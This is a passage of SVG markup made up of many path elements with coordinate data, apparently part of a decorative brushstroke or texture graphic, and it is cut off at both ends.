d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path 